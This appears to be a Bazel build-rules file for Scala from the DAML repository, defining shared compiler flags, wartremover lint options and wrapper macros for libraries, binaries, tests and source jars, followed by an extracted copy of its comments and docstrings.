"-P:wartremover:traverser:org.wartremover.warts.NonUnitStatements", # "-P:wartremover:traverser:org.wartremover.warts.Nothing", # "-P:wartremover:traverser:org.wartremover.warts.Null", "-P:wartremover:traverser:org.wartremover.warts.Option2Iterable", # "-P:wartremover:traverser:org.wartremover.warts.OptionPartial", # "-P:wartremover:traverser:org.wartremover.warts.Overloading", "-P:wartremover:traverser:org.wartremover.warts.Product", # "-P:wartremover:traverser:org.wartremover.warts.PublicInference", # "-P:wartremover:traverser:org.wartremover.warts.Recursion", "-P:wartremover:traverser:org.wartremover.warts.Return", "-P:wartremover:traverser:org.wartremover.warts.Serializable", "-P:wartremover:traverser:org.wartremover.warts.StringPlusAny", # "-P:wartremover:traverser:org.wartremover.warts.Throw", # "-P:wartremover:traverser:org.wartremover.warts.ToString", # "-P:wartremover:traverser:org.wartremover.warts.TraversableOps", # "-P:wartremover:traverser:org.wartremover.warts.TryPartial", # "-P:wartremover:traverser:org.wartremover.warts.Var", # "-P:wartremover:traverser:org.wartremover.warts.While", ] # delete items from lf_scalacopts as they are restored to common_scalacopts and plugin_scalacopts # # calculate items to delete # $ python # ... copypaste ... 
# >>> filter(set(common_scalacopts + plugin_scalacopts).__contains__, lf_scalacopts) # [] # ^ means nothing to remove lf_scalacopts = [ "-Ywarn-unused", ] def _wrap_rule(rule, name = "", scalacopts = [], plugins = [], **kwargs): rule( name = name, scalacopts = common_scalacopts + plugin_scalacopts + scalacopts, plugins = common_plugins + plugins, **kwargs ) def _wrap_rule_no_plugins(rule, scalacopts = [], **kwargs): rule( scalacopts = common_scalacopts + scalacopts, **kwargs ) def _strip_path_upto(path, upto): idx = path.find(upto) if idx >= 0: return [path[idx + len(upto):].strip("/")] else: return [] def _scala_source_jar_impl(ctx): zipper_args = [ "%s=%s" % (new_path, src.path) for src in ctx.files.srcs for new_path in _strip_path_upto(src.path, ctx.attr.strip_upto) ] zipper_args_file = ctx.actions.declare_file( ctx.label.name + ".zipper_args", ) manifest_file = ctx.actions.declare_file( ctx.label.name + "_MANIFEST.MF", sibling = zipper_args_file, ) ctx.actions.write(manifest_file, "Manifest-Version: 1.0\n") zipper_args += ["META-INF/MANIFEST.MF=" + manifest_file.path + "\n"] ctx.actions.write(zipper_args_file, "\n".join(zipper_args)) ctx.actions.run( executable = ctx.executable._zipper, inputs = ctx.files.srcs + [manifest_file, zipper_args_file], outputs = [ctx.outputs.out], arguments = ["c", ctx.outputs.out.path, "@" + zipper_args_file.path], mnemonic = "ScalaSourceJar", ) scala_source_jar = rule( implementation = _scala_source_jar_impl, attrs = { "srcs": attr.label_list(allow_files = True), # The string to strip up to from source file paths. # E.g. "main/scala" strips "foo/src/main/scala/com/daml/Foo.scala" # to "com/daml/Foo.scala". # Files not matching are not included in the source jar, # so you may end up with empty source jars. # TODO(JM): Add support for multiple options. 
"strip_upto": attr.string(default = "main/scala"), "_zipper": attr.label( default = Label("@bazel_tools//tools/zip:zipper"), cfg = "host", executable = True, allow_files = True, ), }, outputs = { "out": "%{name}.jar", }, ) def _create_scala_source_jar(**kwargs): # Try to not create empty source jars. We may still end up # with them if the "strip_upto" does not match any of the # paths. if len(kwargs["srcs"]) > 0: scala_source_jar( name = kwargs["name"] + "_src", srcs = kwargs["srcs"], ) def da_scala_library(name, **kwargs): """ Define a Scala library. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_library` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_library """ _wrap_rule(scala_library, name, **kwargs) _create_scala_source_jar(**(kwargs + {"name": name})) if "tags" in kwargs: for tag in kwargs["tags"]: if tag.startswith("maven_coordinates="): pom_file( name = name + "_pom", target = ":" + name, ) break def da_scala_macro_library(**kwargs): """ Define a Scala library that contains macros. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_macro_library` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_library """ _wrap_rule(scala_macro_library, **kwargs) _create_scala_source_jar(**kwargs) def da_scala_binary(name, **kwargs): """ Define a Scala executable. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_binary` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. 
[rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_binary """ _wrap_rule(scala_binary, name, **kwargs) if "tags" in kwargs: for tag in kwargs["tags"]: if tag.startswith("maven_coordinates="): pom_file( name = name + "_pom", target = ":" + name, ) break def da_scala_test(**kwargs): """ Define a Scala executable that runs the unit tests in the given source files. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_test` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_test """ _wrap_rule(scala_test, **kwargs) def da_scala_test_suite(**kwargs): """ Define a Scala test executable for each source file and bundle them into one target. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_test_suite` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_test_suite """ _wrap_rule(scala_test_suite, use_short_names = is_windows, **kwargs) # TODO make the jmh rule work with plugins -- probably # just a matter of passing the flag in def da_scala_benchmark_jmh(**kwargs): _wrap_rule_no_plugins(scala_benchmark_jmh, **kwargs)
en
0.678589
# Copyright (c) 2019 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved. # SPDX-License-Identifier: Apache-2.0 # This file defines common Scala compiler flags and plugins used throughout # this repository. The initial set of flags is taken from the ledger-client # project. If you find that additional flags are required for another project, # consider whether all projects could benefit from these changes. If so, add # them here. # # Use the macros `da_scala_*` defined in this file, instead of the stock rules # `scala_*` from `rules_scala` in order for these default flags to take effect. # doesn't allow advance features of the language without explict import # (higherkinds, implicits) # more detailed information about type-erasure related warnings # warn if using deprecated stuff # better error reporting for pureconfig # adapted args is a deprecated feature: # `def foo(a: (A, B))` can be called with `foo(a, b)`. # properly it should be `foo((a,b))` # Warn about implicit conversion between numerical types # Gives a warning for functions declared as returning Unit, but the body returns a value # unfortunately give false warning for the `(a, b) = someTuple` # line inside a for comprehension # "-Ywarn-unused" # do not enable wart remover for now, because we need to fix a lot of # test code, which didn't have wart remover enabled before # This lists all wartremover linting passes. 
# The list of enabled ones is pretty arbitrary, please ping Francesco for # info # "-P:wartremover:traverser:org.wartremover.warts.AsInstanceOf", # "-P:wartremover:traverser:org.wartremover.warts.DefaultArguments", # "-P:wartremover:traverser:org.wartremover.warts.EitherProjectionPartial", # "-P:wartremover:traverser:org.wartremover.warts.Equals", # "-P:wartremover:traverser:org.wartremover.warts.FinalCaseClass", # "-P:wartremover:traverser:org.wartremover.warts.FinalVal", # "-P:wartremover:traverser:org.wartremover.warts.ImplicitConversion", # "-P:wartremover:traverser:org.wartremover.warts.ImplicitParameter", # "-P:wartremover:traverser:org.wartremover.warts.IsInstanceOf", # "-P:wartremover:traverser:org.wartremover.warts.MutableDataStructures", # "-P:wartremover:traverser:org.wartremover.warts.NonUnitStatements", # "-P:wartremover:traverser:org.wartremover.warts.Nothing", # "-P:wartremover:traverser:org.wartremover.warts.Null", # "-P:wartremover:traverser:org.wartremover.warts.OptionPartial", # "-P:wartremover:traverser:org.wartremover.warts.Overloading", # "-P:wartremover:traverser:org.wartremover.warts.PublicInference", # "-P:wartremover:traverser:org.wartremover.warts.Recursion", # "-P:wartremover:traverser:org.wartremover.warts.Throw", # "-P:wartremover:traverser:org.wartremover.warts.ToString", # "-P:wartremover:traverser:org.wartremover.warts.TraversableOps", # "-P:wartremover:traverser:org.wartremover.warts.TryPartial", # "-P:wartremover:traverser:org.wartremover.warts.Var", # "-P:wartremover:traverser:org.wartremover.warts.While", # delete items from lf_scalacopts as they are restored to common_scalacopts and plugin_scalacopts # # calculate items to delete # $ python # ... copypaste ... # >>> filter(set(common_scalacopts + plugin_scalacopts).__contains__, lf_scalacopts) # [] # ^ means nothing to remove # The string to strip up to from source file paths. # E.g. "main/scala" strips "foo/src/main/scala/com/daml/Foo.scala" # to "com/daml/Foo.scala". 
# Files not matching are not included in the source jar, # so you may end up with empty source jars. # TODO(JM): Add support for multiple options. # Try to not create empty source jars. We may still end up # with them if the "strip_upto" does not match any of the # paths. Define a Scala library. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_library` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_library Define a Scala library that contains macros. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_macro_library` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_library Define a Scala executable. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_binary` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_binary Define a Scala executable that runs the unit tests in the given source files. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_test` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_test Define a Scala test executable for each source file and bundle them into one target. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_test_suite` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_test_suite # TODO make the jmh rule work with plugins -- probably # just a matter of passing the flag in
1.52488
2
ResponsiveWebDesign/main.py
Flo-Slv/freeCodeCamp
0
6627924
import time from http.server import HTTPServer from server import Server HOST_NAME = 'localhost' PORT = 8000 if __name__ == "__main__": httpd = HTTPServer((HOST_NAME,PORT),Server) print(time.asctime(), "Start server - %s:%s"%(HOST_NAME,PORT)) try: httpd.serve_forever() except KeyboardInterrupt: pass httpd.server_close() print(time.asctime(), "Stop server - %s:%s"%(HOST_NAME,PORT))
import time from http.server import HTTPServer from server import Server HOST_NAME = 'localhost' PORT = 8000 if __name__ == "__main__": httpd = HTTPServer((HOST_NAME,PORT),Server) print(time.asctime(), "Start server - %s:%s"%(HOST_NAME,PORT)) try: httpd.serve_forever() except KeyboardInterrupt: pass httpd.server_close() print(time.asctime(), "Stop server - %s:%s"%(HOST_NAME,PORT))
none
1
2.558605
3
pysc2/tests/random_agent_test.py
zeuseyera/pysc2
20
6627925
#!/usr/bin/python # Copyright 2017 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Run a random agent for a few steps.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from absl.testing import absltest from absl.testing import parameterized from pysc2.agents import random_agent from pysc2.env import run_loop from pysc2.env import sc2_env from pysc2.tests import utils class TestRandomAgent(parameterized.TestCase, utils.TestCase): @parameterized.named_parameters( ("features", sc2_env.AgentInterfaceFormat( feature_dimensions=sc2_env.Dimensions(screen=84, minimap=64))), ("rgb", sc2_env.AgentInterfaceFormat( rgb_dimensions=sc2_env.Dimensions(screen=128, minimap=64))), ("all", sc2_env.AgentInterfaceFormat( feature_dimensions=sc2_env.Dimensions(screen=84, minimap=64), rgb_dimensions=sc2_env.Dimensions(screen=128, minimap=64), action_space=sc2_env.ActionSpace.FEATURES, use_unit_counts=True, use_feature_units=True)), ) def test_random_agent(self, agent_interface_format): steps = 250 step_mul = 8 with sc2_env.SC2Env( map_name="Simple64", agent_interface_format=agent_interface_format, step_mul=step_mul, game_steps_per_episode=steps * step_mul//2) as env: agent = random_agent.RandomAgent() run_loop.run_loop([agent], env, steps) self.assertEqual(agent.steps, steps) if __name__ == "__main__": absltest.main()
#!/usr/bin/python # Copyright 2017 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Run a random agent for a few steps.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from absl.testing import absltest from absl.testing import parameterized from pysc2.agents import random_agent from pysc2.env import run_loop from pysc2.env import sc2_env from pysc2.tests import utils class TestRandomAgent(parameterized.TestCase, utils.TestCase): @parameterized.named_parameters( ("features", sc2_env.AgentInterfaceFormat( feature_dimensions=sc2_env.Dimensions(screen=84, minimap=64))), ("rgb", sc2_env.AgentInterfaceFormat( rgb_dimensions=sc2_env.Dimensions(screen=128, minimap=64))), ("all", sc2_env.AgentInterfaceFormat( feature_dimensions=sc2_env.Dimensions(screen=84, minimap=64), rgb_dimensions=sc2_env.Dimensions(screen=128, minimap=64), action_space=sc2_env.ActionSpace.FEATURES, use_unit_counts=True, use_feature_units=True)), ) def test_random_agent(self, agent_interface_format): steps = 250 step_mul = 8 with sc2_env.SC2Env( map_name="Simple64", agent_interface_format=agent_interface_format, step_mul=step_mul, game_steps_per_episode=steps * step_mul//2) as env: agent = random_agent.RandomAgent() run_loop.run_loop([agent], env, steps) self.assertEqual(agent.steps, steps) if __name__ == "__main__": absltest.main()
en
0.846204
#!/usr/bin/python # Copyright 2017 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Run a random agent for a few steps.
2.316403
2
daily_programmer/384.py
davidlowryduda/pythonMiniProjects
0
6627926
<filename>daily_programmer/384.py """ Sample Use ========== echo -e "3d6\n10d13\n2d5" | python3 384.py Description =========== I love playing D&D with my friends, and my favorite part is creating character sheets (my DM is notorious for killing us all off by level 3 or so). One major part of making character sheets is rolling the character's stats. Sadly, I have lost all my dice, so I'm asking for your help to make a dice roller for me to use! Formal Inputs & Outputs ======================= Input description ----------------- Your input will contain one or more lines, where each line will be in the form of "NdM"; for example: 3d6 4d12 1d10 5d4 If you've ever played D&D you probably recognize those, but for the rest of you, this is what those mean: The first number is the number of dice to roll, the d just means "dice", it's just used to split up the two numbers, and the second number is how many sides the dice have. So the above example of "3d6" means "roll 3 6-sided dice". Also, just in case you didn't know, in D&D, not all the dice we roll are the normal cubes. A d6 is a cube, because it's a 6-sided die, but a d20 has twenty sides, so it looks a lot closer to a ball than a cube. The first number, the number of dice to roll, can be any integer between 1 and 100, inclusive. The second number, the number of sides of the dice, can be any integer between 2 and 100, inclusive. Output description ------------------ You should output the sum of all the rolls of that specified die, each on their own line. so if your input is "3d6", the output should look something like 14 Just a single number, you rolled 3 6-sided dice, and they added up to 14. Challenge Input 5d12 6d4 1d2 1d8 3d6 4d20 100d100 Challenge Output [some number between 5 and 60, probably closer to 32 or 33] [some number between 6 and 24, probably around 15] [you get the idea] [...] 
Notes/Hints =========== A dice roll is basically the same as picking a random number between 1 and 6 (or 12, or 20, or however many sides the die has). You should use some way of randomly selecting a number within a range based off of your input. Many common languages have random number generators available, but at least a few of them will give the same "random" numbers every time you use the program. In my opinion that's not very random. If you run your code 3+ times with the same inputs and it gives the same outputs, that wouldn't be super useful for a game of D&D, would it? If that happens with your code, try to find a way around that. I'm guessing for some of the newer folks, this might be one of the trickier parts to get correct. Don't just multiply your roll by the number of dice, please. I don't know if any of you were thinking about doing that, but I was. The problem is that if you do that, it eliminates a lot of possible values. For example, there's no way to roll 14 from 3d6 if you just roll it once and multiply by 3. Setting up a loop to roll each die is probably your best bet here. Bonus ===== In addition to the sum of all dice rolls for your output, print out the result of each roll on the same line, using a format that looks something like 14: 6 3 5 22: 10 7 1 4 9: 9 11: 3 2 2 1 3 You could also try setting it up so that you can manually input more rolls. that way you can just leave the program open and every time you want to roll more dice, you just type it in and hit enter. 
""" import random import sys from typing import Tuple, List, Union class Die: def __init__(self, sides : int) -> None: self.sides = sides def __str__(self) -> str: return str(self.sides) def roll(self) -> int: return random.randint(1, self.sides) def parse_dice_string(dice_string : str) -> Tuple[int, int]: """Given nds, interpret this as n `num_dice` with `s` sides.""" num_dice, _, sides = dice_string.partition("d") return (int(num_dice), int(sides)) class DiceBag: def __init__(self, dice_string : str) -> None: self.num_dice, self.sides = parse_dice_string(dice_string) self.dice = [Die(self.sides) for _ in range(self.num_dice)] def roll(self) -> List[int]: self.roll_result = list(map(lambda die: die.roll(), self.dice)) return self.roll_result def sum(self) -> int: return sum(self.roll_result) def print_roll(self, newroll: bool = True): if newroll: self.roll() print(str(self.sum()) + ": " + ' '.join(str(dieroll) for dieroll in self.roll_result)) def parse_input(): input_dice = [DiceBag(input_line) for input_line in sys.stdin.readlines()] if not input_dice: print("No input detected. Terminating.") return list(map(lambda dicebag: dicebag.print_roll(), input_dice)) return if __name__ == "__main__": parse_input()
<filename>daily_programmer/384.py """ Sample Use ========== echo -e "3d6\n10d13\n2d5" | python3 384.py Description =========== I love playing D&D with my friends, and my favorite part is creating character sheets (my DM is notorious for killing us all off by level 3 or so). One major part of making character sheets is rolling the character's stats. Sadly, I have lost all my dice, so I'm asking for your help to make a dice roller for me to use! Formal Inputs & Outputs ======================= Input description ----------------- Your input will contain one or more lines, where each line will be in the form of "NdM"; for example: 3d6 4d12 1d10 5d4 If you've ever played D&D you probably recognize those, but for the rest of you, this is what those mean: The first number is the number of dice to roll, the d just means "dice", it's just used to split up the two numbers, and the second number is how many sides the dice have. So the above example of "3d6" means "roll 3 6-sided dice". Also, just in case you didn't know, in D&D, not all the dice we roll are the normal cubes. A d6 is a cube, because it's a 6-sided die, but a d20 has twenty sides, so it looks a lot closer to a ball than a cube. The first number, the number of dice to roll, can be any integer between 1 and 100, inclusive. The second number, the number of sides of the dice, can be any integer between 2 and 100, inclusive. Output description ------------------ You should output the sum of all the rolls of that specified die, each on their own line. so if your input is "3d6", the output should look something like 14 Just a single number, you rolled 3 6-sided dice, and they added up to 14. Challenge Input 5d12 6d4 1d2 1d8 3d6 4d20 100d100 Challenge Output [some number between 5 and 60, probably closer to 32 or 33] [some number between 6 and 24, probably around 15] [you get the idea] [...] 
Notes/Hints =========== A dice roll is basically the same as picking a random number between 1 and 6 (or 12, or 20, or however many sides the die has). You should use some way of randomly selecting a number within a range based off of your input. Many common languages have random number generators available, but at least a few of them will give the same "random" numbers every time you use the program. In my opinion that's not very random. If you run your code 3+ times with the same inputs and it gives the same outputs, that wouldn't be super useful for a game of D&D, would it? If that happens with your code, try to find a way around that. I'm guessing for some of the newer folks, this might be one of the trickier parts to get correct. Don't just multiply your roll by the number of dice, please. I don't know if any of you were thinking about doing that, but I was. The problem is that if you do that, it eliminates a lot of possible values. For example, there's no way to roll 14 from 3d6 if you just roll it once and multiply by 3. Setting up a loop to roll each die is probably your best bet here. Bonus ===== In addition to the sum of all dice rolls for your output, print out the result of each roll on the same line, using a format that looks something like 14: 6 3 5 22: 10 7 1 4 9: 9 11: 3 2 2 1 3 You could also try setting it up so that you can manually input more rolls. that way you can just leave the program open and every time you want to roll more dice, you just type it in and hit enter. 
""" import random import sys from typing import Tuple, List, Union class Die: def __init__(self, sides : int) -> None: self.sides = sides def __str__(self) -> str: return str(self.sides) def roll(self) -> int: return random.randint(1, self.sides) def parse_dice_string(dice_string : str) -> Tuple[int, int]: """Given nds, interpret this as n `num_dice` with `s` sides.""" num_dice, _, sides = dice_string.partition("d") return (int(num_dice), int(sides)) class DiceBag: def __init__(self, dice_string : str) -> None: self.num_dice, self.sides = parse_dice_string(dice_string) self.dice = [Die(self.sides) for _ in range(self.num_dice)] def roll(self) -> List[int]: self.roll_result = list(map(lambda die: die.roll(), self.dice)) return self.roll_result def sum(self) -> int: return sum(self.roll_result) def print_roll(self, newroll: bool = True): if newroll: self.roll() print(str(self.sum()) + ": " + ' '.join(str(dieroll) for dieroll in self.roll_result)) def parse_input(): input_dice = [DiceBag(input_line) for input_line in sys.stdin.readlines()] if not input_dice: print("No input detected. Terminating.") return list(map(lambda dicebag: dicebag.print_roll(), input_dice)) return if __name__ == "__main__": parse_input()
en
0.931697
Sample Use ========== echo -e "3d6\n10d13\n2d5" | python3 384.py Description =========== I love playing D&D with my friends, and my favorite part is creating character sheets (my DM is notorious for killing us all off by level 3 or so). One major part of making character sheets is rolling the character's stats. Sadly, I have lost all my dice, so I'm asking for your help to make a dice roller for me to use! Formal Inputs & Outputs ======================= Input description ----------------- Your input will contain one or more lines, where each line will be in the form of "NdM"; for example: 3d6 4d12 1d10 5d4 If you've ever played D&D you probably recognize those, but for the rest of you, this is what those mean: The first number is the number of dice to roll, the d just means "dice", it's just used to split up the two numbers, and the second number is how many sides the dice have. So the above example of "3d6" means "roll 3 6-sided dice". Also, just in case you didn't know, in D&D, not all the dice we roll are the normal cubes. A d6 is a cube, because it's a 6-sided die, but a d20 has twenty sides, so it looks a lot closer to a ball than a cube. The first number, the number of dice to roll, can be any integer between 1 and 100, inclusive. The second number, the number of sides of the dice, can be any integer between 2 and 100, inclusive. Output description ------------------ You should output the sum of all the rolls of that specified die, each on their own line. so if your input is "3d6", the output should look something like 14 Just a single number, you rolled 3 6-sided dice, and they added up to 14. Challenge Input 5d12 6d4 1d2 1d8 3d6 4d20 100d100 Challenge Output [some number between 5 and 60, probably closer to 32 or 33] [some number between 6 and 24, probably around 15] [you get the idea] [...] Notes/Hints =========== A dice roll is basically the same as picking a random number between 1 and 6 (or 12, or 20, or however many sides the die has). 
You should use some way of randomly selecting a number within a range based off of your input. Many common languages have random number generators available, but at least a few of them will give the same "random" numbers every time you use the program. In my opinion that's not very random. If you run your code 3+ times with the same inputs and it gives the same outputs, that wouldn't be super useful for a game of D&D, would it? If that happens with your code, try to find a way around that. I'm guessing for some of the newer folks, this might be one of the trickier parts to get correct. Don't just multiply your roll by the number of dice, please. I don't know if any of you were thinking about doing that, but I was. The problem is that if you do that, it eliminates a lot of possible values. For example, there's no way to roll 14 from 3d6 if you just roll it once and multiply by 3. Setting up a loop to roll each die is probably your best bet here. Bonus ===== In addition to the sum of all dice rolls for your output, print out the result of each roll on the same line, using a format that looks something like 14: 6 3 5 22: 10 7 1 4 9: 9 11: 3 2 2 1 3 You could also try setting it up so that you can manually input more rolls. that way you can just leave the program open and every time you want to roll more dice, you just type it in and hit enter. Given nds, interpret this as n `num_dice` with `s` sides.
3.302452
3
userbot/modules/misc/b64.py
ZJRDroid/PaperplaneRemix
0
6627927
import pybase64 from ..help import add_help_item from userbot.events import register from userbot.utils.tgdoc import * @register(outgoing=True, pattern=r"^\.b64\s+(en|de)(?:\s+(.*))?") async def endecrypt(e): """ For .b64 command, find the base64 encoding of the given string. """ reply_message = await e.get_reply_message() text = e.pattern_match.group(2) or reply_message.message output = Section(SubSection(Bold("Input"), Code(text), indent=0), indent=0) if e.pattern_match.group(1) == "en": lething = str(pybase64.b64encode(bytes(text, "utf-8")))[2:] output += SubSection(Bold("Encoded"), Code(lething[:-1]), indent=0) else: lething = str(pybase64.b64decode(bytes(text, "utf-8"), validate=True))[2:] output += SubSection(Bold("Decoded"), Code(lething[:-1]), indent=0) await e.edit(str(output)) add_help_item( ".b64", "Misc", "Base64 encode/decode the message or replied to message.", """ `.b64 (en|de) (message)` Or, in reply to a message `.b64 (en|de)` """ )
import pybase64 from ..help import add_help_item from userbot.events import register from userbot.utils.tgdoc import * @register(outgoing=True, pattern=r"^\.b64\s+(en|de)(?:\s+(.*))?") async def endecrypt(e): """ For .b64 command, find the base64 encoding of the given string. """ reply_message = await e.get_reply_message() text = e.pattern_match.group(2) or reply_message.message output = Section(SubSection(Bold("Input"), Code(text), indent=0), indent=0) if e.pattern_match.group(1) == "en": lething = str(pybase64.b64encode(bytes(text, "utf-8")))[2:] output += SubSection(Bold("Encoded"), Code(lething[:-1]), indent=0) else: lething = str(pybase64.b64decode(bytes(text, "utf-8"), validate=True))[2:] output += SubSection(Bold("Decoded"), Code(lething[:-1]), indent=0) await e.edit(str(output)) add_help_item( ".b64", "Misc", "Base64 encode/decode the message or replied to message.", """ `.b64 (en|de) (message)` Or, in reply to a message `.b64 (en|de)` """ )
en
0.390855
For .b64 command, find the base64 encoding of the given string. `.b64 (en|de) (message)` Or, in reply to a message `.b64 (en|de)`
2.515272
3
tests/test_state.py
wboxx1/boxx-pymonad
0
6627928
# -------------------------------------------------------- # (c) Copyright 2014, 2020 by <NAME>. # Licensed under BSD 3-clause licence. # -------------------------------------------------------- import unittest import common_tests import pymonad from pymonad.state import _State class EqState(pymonad.monad.MonadAlias, _State): def __eq__(self, other): try: return self.run(0) == other.run(0) except: return self.run(0) == other class StateTests(unittest.TestCase): def test_insert(self): self.assertEqual( EqState.insert(2), (2, 0) ) class StateFunctor(common_tests.FunctorTests, unittest.TestCase): def setUp(self): self._class = EqState class StateApplicative(common_tests.ApplicativeTests, unittest.TestCase): def setUp(self): self._class = EqState class StateMonad(common_tests.MonadTests, unittest.TestCase): def setUp(self): self._class = EqState class StateThen(common_tests.ThenTests, unittest.TestCase): def setUp(self): self._class = EqState
# -------------------------------------------------------- # (c) Copyright 2014, 2020 by <NAME>. # Licensed under BSD 3-clause licence. # -------------------------------------------------------- import unittest import common_tests import pymonad from pymonad.state import _State class EqState(pymonad.monad.MonadAlias, _State): def __eq__(self, other): try: return self.run(0) == other.run(0) except: return self.run(0) == other class StateTests(unittest.TestCase): def test_insert(self): self.assertEqual( EqState.insert(2), (2, 0) ) class StateFunctor(common_tests.FunctorTests, unittest.TestCase): def setUp(self): self._class = EqState class StateApplicative(common_tests.ApplicativeTests, unittest.TestCase): def setUp(self): self._class = EqState class StateMonad(common_tests.MonadTests, unittest.TestCase): def setUp(self): self._class = EqState class StateThen(common_tests.ThenTests, unittest.TestCase): def setUp(self): self._class = EqState
en
0.514836
# -------------------------------------------------------- # (c) Copyright 2014, 2020 by <NAME>. # Licensed under BSD 3-clause licence. # --------------------------------------------------------
2.464656
2
webindexer/__init__.py
rr-/pyindexer
3
6627929
from .indexer import application
from .indexer import application
none
1
1.088134
1
xlsxwriter/test/comparison/test_set_row03.py
Rippling/XlsxWriter-1
0
6627930
############################################################################### # # Tests for XlsxWriter. # # SPDX-License-Identifier: BSD-2-Clause # Copyright (c), 2013-2019, <NAME>, <EMAIL> # from ..excel_comparison_test import ExcelComparisonTest from ...workbook import Workbook class TestCompareXLSXFiles(ExcelComparisonTest): """ Test file created by XlsxWriter against a file created by Excel. """ def setUp(self): self.set_filename('set_row03.xlsx') def test_create_file(self): """Test the creation of a simple XlsxWriter file.""" workbook = Workbook(self.got_filename) worksheet = workbook.add_worksheet() worksheet.set_row(0, 0.75) worksheet.set_row(1, 1.50) worksheet.set_row(2, 2.25) worksheet.set_row(3, 3) worksheet.set_row(11, 9) worksheet.set_row(12, 9.75) worksheet.set_row(13, 10.50) worksheet.set_row(14, 11.25) worksheet.set_row(18, 14.25) worksheet.set_row(20, 15.75, None, {'hidden': True}) worksheet.set_row(21, 16.50) workbook.close() self.assertExcelEqual()
############################################################################### # # Tests for XlsxWriter. # # SPDX-License-Identifier: BSD-2-Clause # Copyright (c), 2013-2019, <NAME>, <EMAIL> # from ..excel_comparison_test import ExcelComparisonTest from ...workbook import Workbook class TestCompareXLSXFiles(ExcelComparisonTest): """ Test file created by XlsxWriter against a file created by Excel. """ def setUp(self): self.set_filename('set_row03.xlsx') def test_create_file(self): """Test the creation of a simple XlsxWriter file.""" workbook = Workbook(self.got_filename) worksheet = workbook.add_worksheet() worksheet.set_row(0, 0.75) worksheet.set_row(1, 1.50) worksheet.set_row(2, 2.25) worksheet.set_row(3, 3) worksheet.set_row(11, 9) worksheet.set_row(12, 9.75) worksheet.set_row(13, 10.50) worksheet.set_row(14, 11.25) worksheet.set_row(18, 14.25) worksheet.set_row(20, 15.75, None, {'hidden': True}) worksheet.set_row(21, 16.50) workbook.close() self.assertExcelEqual()
en
0.410052
############################################################################### # # Tests for XlsxWriter. # # SPDX-License-Identifier: BSD-2-Clause # Copyright (c), 2013-2019, <NAME>, <EMAIL> # Test file created by XlsxWriter against a file created by Excel. Test the creation of a simple XlsxWriter file.
2.640836
3
src/wenet/interface/exceptions.py
Dyuko/common-models-py
0
6627931
<reponame>Dyuko/common-models-py from __future__ import absolute_import, annotations class AuthenticationException(ValueError): def __init__(self, interface: str, http_status_code: int, server_response: str) -> None: super().__init__(f"Not a valid authentication for the [{interface}] interface. Request has return a code [{http_status_code}] with content [{server_response}]") self.http_status_code = http_status_code self.server_response = server_response self.message = f"Not a valid authentication for the [{interface}] interface. Request has return a code [{http_status_code}] with content [{server_response}]" class NotFound(ValueError): def __init__(self, object_type: str, object_id: str, http_status_code: int, server_response: str) -> None: super().__init__(f"{object_type} with [{object_id}] does not exist. Request has return a code [{http_status_code}] with content [{server_response}]") self.http_status_code = http_status_code self.server_response = server_response self.message = f"{object_type} with [{object_id}] does not exist. Request has return a code [{http_status_code}] with content [{server_response}]" class CreationError(ValueError): def __init__(self, http_status_code: int, server_response: str) -> None: super().__init__(f"Request has return a code [{http_status_code}] with content [{server_response}]") self.http_status_code = http_status_code self.server_response = server_response self.message = f"Request has 